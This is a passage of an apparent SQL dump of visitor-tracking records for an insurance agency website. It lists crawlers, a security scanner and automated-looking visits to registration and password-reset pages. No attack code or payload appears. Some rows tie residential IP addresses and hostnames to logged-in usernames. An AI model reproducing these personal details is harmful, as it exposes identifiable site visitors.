6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12546,'0b_c5825929c215d193dda4a0941bcd3823','1459768604','188.143.234.155','188.143.234.155','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12549,'0b_c5825929c215d193dda4a0941bcd3823','1459768615','188.143.234.155','188.143.234.155','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12552,'0b_c5825929c215d193dda4a0941bcd3823','1459768629','188.143.234.155','188.143.234.155','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12554,'0b_c5825929c215d193dda4a0941bcd3823','1459768640','188.143.234.155','188.143.234.155','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12555,'0b_c5825929c215d193dda4a0941bcd3823','1459768651','188.143.234.155','188.143.234.155','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12557,'0b_c5825929c215d193dda4a0941bcd3823','1459768663','188.143.234.155','188.143.234.155','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12558,'0b_c5825929c215d193dda4a0941bcd3823','1459768674','188.143.234.155','188.143.234.155','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12560,'0b_c5825929c215d193dda4a0941bcd3823','1459768685','188.143.234.155','188.143.234.155','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12561,'0b_c5825929c215d193dda4a0941bcd3823','1459768698','188.143.234.155','188.143.234.155','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12564,'0b_c5825929c215d193dda4a0941bcd3823','1459768708','188.143.234.155','188.143.234.155','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12567,'0b_270be014b4cf0b4f0a8785db64788aa5','1459768719','188.143.232.27','188.143.232.27','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12570,'0b_c5825929c215d193dda4a0941bcd3823','1459768719','188.143.234.155','188.143.234.155','/?page_id=169','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12572,'0b_c5825929c215d193dda4a0941bcd3823','1459768729','188.143.234.155','188.143.234.155','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12575,'0b_c5825929c215d193dda4a0941bcd3823','1459768742','188.143.234.155','188.143.234.155','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12576,'0b_c5825929c215d193dda4a0941bcd3823','1459768785','188.143.234.155','188.143.234.155','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12579,'0b_c5825929c215d193dda4a0941bcd3823','1459768797','188.143.234.155','188.143.234.155','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12581,'0b_c5825929c215d193dda4a0941bcd3823','1459768808','188.143.234.155','188.143.234.155','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12584,'0b_c5825929c215d193dda4a0941bcd3823','1459768820','188.143.234.155','188.143.234.155','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12587,'0b_c5825929c215d193dda4a0941bcd3823','1459768832','188.143.234.155','188.143.234.155','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12590,'0b_c5825929c215d193dda4a0941bcd3823','1459768843','188.143.234.155','188.143.234.155','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12593,'0b_c5825929c215d193dda4a0941bcd3823','1459768854','188.143.234.155','188.143.234.155','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12594,'0b_c5825929c215d193dda4a0941bcd3823','1459768865','188.143.234.155','188.143.234.155','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12597,'0b_c5825929c215d193dda4a0941bcd3823','1459768876','188.143.234.155','188.143.234.155','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12600,'0b_c5825929c215d193dda4a0941bcd3823','1459768887','188.143.234.155','188.143.234.155','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12603,'0b_c5825929c215d193dda4a0941bcd3823','1459768898','188.143.234.155','188.143.234.155','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12606,'0b_c5825929c215d193dda4a0941bcd3823','1459768910','188.143.234.155','188.143.234.155','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12608,'0b_c5825929c215d193dda4a0941bcd3823','1459768920','188.143.234.155','188.143.234.155','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12611,'0b_c5825929c215d193dda4a0941bcd3823','1459768931','188.143.234.155','188.143.234.155','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12612,'0b_c5825929c215d193dda4a0941bcd3823','1459768942','188.143.234.155','188.143.234.155','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12614,'0b_c5825929c215d193dda4a0941bcd3823','1459768954','188.143.234.155','188.143.234.155','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12617,'0b_c5825929c215d193dda4a0941bcd3823','1459768965','188.143.234.155','188.143.234.155','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12618,'0b_c5825929c215d193dda4a0941bcd3823','1459768978','188.143.234.155','188.143.234.155','/meet-the-eib-team','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12620,'0b_c5825929c215d193dda4a0941bcd3823','1459768984','188.143.234.155','188.143.234.155','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12623,'0b_c5825929c215d193dda4a0941bcd3823','1459768988','188.143.234.155','188.143.234.155','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12626,'0b_270be014b4cf0b4f0a8785db64788aa5','1459769000','188.143.232.27','188.143.232.27','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12629,'0b_c5825929c215d193dda4a0941bcd3823','1459769025','188.143.234.155','188.143.234.155','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','http://www.empireins.com/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','',0,'Win7 x64','Firefox 41','ru','','','','','','','3','0',0),(12632,'0b_270be014b4cf0b4f0a8785db64788aa5','1459769051','188.143.232.27','188.143.232.27','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12633,'0b_270be014b4cf0b4f0a8785db64788aa5','1459769062','188.143.232.27','188.143.232.27','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12636,'0b_270be014b4cf0b4f0a8785db64788aa5','1459769073','188.143.232.27','188.143.232.27','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12639,'0b_270be014b4cf0b4f0a8785db64788aa5','1459769084','188.143.232.27','188.143.232.27','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Win7 x64','Firefox 41','ru','','','','','','','0','0',0),(12641,'0b_518464d235485e9429af0ee79bba50cc','1459769498','157.55.39.161','msnbot-157-55-39-161.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12642,'0b_76f9df49e6628b6b3b568fa8fe2c5b7e','1459770787','66.249.75.89','crawl-66-249-75-89.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(12645,'0b_958be58849c0e67f32c1eae3270306ba','1459771030','100.43.90.9','spider-100-43-90-9.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(12648,'0b_958be58849c0e67f32c1eae3270306ba','1459771034','100.43.90.9','spider-100-43-90-9.yandex.com','/forms/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(12651,'0b_28c8b1a643984f53d9c6dd20e4853129','1459774302','157.55.39.185','msnbot-157-55-39-185.search.msn.com','/hot.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12654,'0b_39d1611d42b8660806fce9e7503280af','1459775367','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12657,'0b_6a14f1b56bee5bf382b1b9d3b955a246','1459775820','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(12659,'0b_6c4f3ce06d536ebb911e73de523a739c','1459775957','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(12662,'0b_6c4f3ce06d536ebb911e73de523a739c','1459775959','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(12663,'0b_c376b7d47d6a423ca1f638d0f83e4c8e','1459776509','91.194.84.106','f481.fuchsia.fastwebserver.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(12666,'0b_c376b7d47d6a423ca1f638d0f83e4c8e','1459776517','91.194.84.106','f481.fuchsia.fastwebserver.de','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(12669,'0b_c376b7d47d6a423ca1f638d0f83e4c8e','1459776533','91.194.84.106','f481.fuchsia.fastwebserver.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(12672,'0b_c376b7d47d6a423ca1f638d0f83e4c8e','1459776539','91.194.84.106','f481.fuchsia.fastwebserver.de','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(12675,'0b_c376b7d47d6a423ca1f638d0f83e4c8e','1459776546','91.194.84.106','f481.fuchsia.fastwebserver.de','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(12678,'0b_c376b7d47d6a423ca1f638d0f83e4c8e','1459776561','91.194.84.106','f481.fuchsia.fastwebserver.de','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(12681,'0b_c376b7d47d6a423ca1f638d0f83e4c8e','1459776577','91.194.84.106','f481.fuchsia.fastwebserver.de','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(12683,'0b_c376b7d47d6a423ca1f638d0f83e4c8e','1459776586','91.194.84.106','f481.fuchsia.fastwebserver.de','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(12686,'0b_c376b7d47d6a423ca1f638d0f83e4c8e','1459776590','91.194.84.106','f481.fuchsia.fastwebserver.de','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(12687,'0b_c9a2fda048022a07ba4625c5fa6880ea','1459777571','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(12689,'0b_c9a2fda048022a07ba4625c5fa6880ea','1459777573','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(12692,'0b_7762b4524ab3e60acffbbddf63719278','1459778225','24.45.193.250','ool-182dc1fa.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win10','Chrome 49','us','1280 x 800','Google','','','','','0','0',0),(12693,'0b_7762b4524ab3e60acffbbddf63719278','1459778229','24.45.193.250','ool-182dc1fa.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1280 x 800','','','','','','0','0',0),(12695,'0b_3369d47ad3e86de23860de529b2df162','1459778617','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12698,'0b_cd4f0eafdc6bac1de8144acdb886a5c6','1459780494','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12699,'0b_f89103cc86df52ee134469d290917840','1459780651','91.121.211.59','mj6.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(12702,'0b_f89103cc86df52ee134469d290917840','1459780654','91.121.211.59','mj6.naefmarco.ch','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(12705,'0b_f89103cc86df52ee134469d290917840','1459780656','91.121.211.59','mj6.naefmarco.ch','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(12707,'0b_6b96737058640f3e07c3c124e7cb9055','1459781826','208.115.111.66','208-115-111-66-reverse.wowrack.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(12710,'0b_b8fc09fc80ad86f57730b6401354316e','1459782461','184.154.36.163','scan21.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(12713,'0b_b8fc09fc80ad86f57730b6401354316e','1459782464','184.154.36.163','scan21.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(12716,'0b_b8fc09fc80ad86f57730b6401354316e','1459782466','184.154.36.163','scan21.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(12719,'0b_b8fc09fc80ad86f57730b6401354316e','1459782469','184.154.36.163','scan21.sitelock.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(12722,'0b_b8fc09fc80ad86f57730b6401354316e','1459782471','184.154.36.163','scan21.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(12725,'0b_b8fc09fc80ad86f57730b6401354316e','1459782473','184.154.36.163','scan21.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(12726,'0b_06d5dfee1343c0c9604324aeccd3529f','1459784386','207.46.13.140','msnbot-207-46-13-140.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12728,'0b_5feeb25e8b39050cd8a85a52e8c8f71a','1459785158','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(12731,'0b_b64e5fb870d7a3bdccf0e928456de34d','1459785277','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(12732,'0b_b64e5fb870d7a3bdccf0e928456de34d','1459785288','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(12735,'0b_e935451180d5440fd3fc7a757436d806','1459786125','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(12737,'0b_e935451180d5440fd3fc7a757436d806','1459786126','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(12740,'0b_b64e5fb870d7a3bdccf0e928456de34d','1459786558','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(12743,'0b_b64e5fb870d7a3bdccf0e928456de34d','1459786569','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(12746,'0b_b64e5fb870d7a3bdccf0e928456de34d','1459786585','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','0',0),(12749,'0b_b64e5fb870d7a3bdccf0e928456de34d','1459786608','50.108.156.48','50.108.156.48','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','ykaufman','','0','51',0),(12750,'0b_2bcad42e0f607a61da37fa1b4c4c0219','1459789486','2.216.175.60','02d8af3c.bb.sky.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36','http://www.empireins.com/','',0,'MacOSX','Chrome 39','us','','','','','','','0','0',0),(12752,'0b_55e495c73c794cb81b675afdc37f95ca','1459790337','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(12753,'0b_55e495c73c794cb81b675afdc37f95ca','1459790339','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(12756,'0b_5b8fe4131124ac4de86e7d64e15de08c','1459790657','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(12759,'0b_232ccd0c2ced2d210dcff01b948b560c','1459791255','180.76.15.149','baiduspider-180-76-15-149.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(12762,'0b_87b82f75acd7ff18d1e1fd76407941ee','1459791311','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(12764,'0b_87b82f75acd7ff18d1e1fd76407941ee','1459791312','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(12767,'0b_0ff149a8a79861740af192302ef415ca','1459791668','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(12770,'0b_0ff149a8a79861740af192302ef415ca','1459791670','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(12773,'0b_319c3ba38b241ee5b29f5800e2158bb3','1459791752','74.101.136.50','pool-74-101-136-50.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://search.yahoo.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(12774,'0b_319c3ba38b241ee5b29f5800e2158bb3','1459791754','74.101.136.50','pool-74-101-136-50.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 